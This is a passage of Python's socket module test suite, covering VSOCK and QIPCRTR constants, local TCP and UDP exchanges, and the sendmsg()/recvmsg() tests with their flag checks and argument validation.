with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
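# For example, a concrete test class is typically assembled by multiple
# inheritance along these lines (hypothetical names, mirroring the
# combinations defined later in this module):
#
#     class SendmsgUDPTest(SendmsgConnectionlessTests,
#                          SendrecvmsgUDPTestBase):
#         pass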
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
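        # For example, with the connectionless defaults
        # ([], [], 0, serv_addr) supplied by
        # SendrecvmsgConnectionlessBase below, sendmsgToServer([MSG])
        # expands to cli_sock.sendmsg([MSG], [], 0, serv_addr).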
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
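        #
        # Worked example (hypothetical attribute values): if
        # msg_flags_common_unset is MSG_CTRUNC and
        # msg_flags_non_eor_indicator is MSG_TRUNC, then
        # checkFlags(flags, eor=False) requires MSG_TRUNC to be set and
        # MSG_CTRUNC to be unset in "flags"; bits outside the computed
        # mask are not examined.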
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
